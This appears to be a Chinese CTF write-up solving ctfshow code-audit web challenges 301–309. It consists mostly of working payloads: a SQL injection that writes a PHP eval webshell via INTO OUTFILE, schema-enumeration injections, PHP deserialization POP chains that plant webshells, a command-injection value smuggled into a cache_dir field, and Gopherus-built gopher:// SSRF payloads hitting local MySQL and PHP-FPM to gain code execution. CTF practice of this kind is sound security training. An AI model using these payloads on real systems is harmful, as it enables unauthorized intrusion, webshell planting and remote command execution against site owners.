ctfshow-web入门-代码审计301-309
web301
用户名直接拼接了 sql注入 写个shell进去
userid=a' union select "<?php eval($_GET[a]);?>" into outfile "/var/www/html/a.php"%23&userpwd=awdweb302
修改的地方没啥影响 同上写shell
web303
蓝奏云链接访问不了 
把s换成x dptadd这里的插入没有过滤 存在注入 
然后在的dpt.php中将数据查询出来 
可以在插入的注入中 某个字段拼接成sql语句查询
首先要登陆 admin admin 登陆
查表名
dpt_name=1',sds_address =(select group_concat(table_name) from information_schema.tables where table_schema=database())%23
查列名
dpt_name=1',sds_address =(select group_concat(column_name) from information_schema.columns where table_name='sds_fl9g')%23
查数据
dpt_name=1',sds_address =(select flag from sds_fl9g)%23
web304
修改了表名同上
web305
poc
<?php
class user{
public $username;
public $password;
public function __construct($u,$p){
$this->username=$u;
$this->password=$p;
}
}
echo serialize(new user('a.php','<?php eval($_POST[1]);?>'));web306
index中有反序列化 
查看引入的php文件 在dao.php中看到__destruct魔术方法中调用了$this->conn->close() 此处的conn是可控的
然后继续看引入的class.php log类中有colse方法可以写文件 
poc
<?php
class log{
public $title;
public $info;
public function __construct(){
$this->title='a.php';
$this->info='<?php eval($_POST[1]);?>';
}
}
class dao{
private $config;
private $conn;
public function __construct(){
$this->conn=new log();
}
}
echo base64_encode(serialize(new dao()));
web307
logout.php中的反序列化 
poc
<?php
class config{
public $cache_dir = ';echo "<?php eval(\$_POST[1]);?>" >a.php;';//linux的shell里面$有特殊意义所以转义一下。
}
class dao{
private $config;
public function __construct(){
$this->config=new config();
}
}
$a=new dao();
echo base64_encode(serialize($a));
?>web308
命令执行增加了过滤 
在fun.php中存在ssrf 
config中mysql也是没有密码 通过gopherus生成payload打mysql 下载地址https://github.com/tarunkant/Gopherus 
poc
<?php
class config{
public $update_url = 'gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%45%00%00%00%03%73%65%6c%65%63%74%20%27%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%30%5d%29%3b%3f%3e%27%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%31%2e%70%68%70%27%01%00%00%00%01';
}
class dao{
private $config;
public function __construct(){
$this->config=new config();
}
}
echo base64_encode(serialize(new dao()));在index中存在反序列化点 header执行后 下边的代码还会继续执行 所以不登录不影响反序列化 
然后访问木马即可
web309
poc
<?php
class config{
public $update_url = 'gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%00%F6%06%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH58%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%09SCRIPT_FILENAMEindex.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%3A%04%00%3C%3Fphp%20system%28%27cat%20f%2A%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00';
}
class dao{
private $config;
public function __construct(){
$this->config=new config();
}
}
$a=new dao();
echo base64_encode(serialize($a));
?>ctfshow-web入门-代码审计301-309
http://example.com/2021/06/08/OldBlog/ctfshow-web入门代码审计301-310/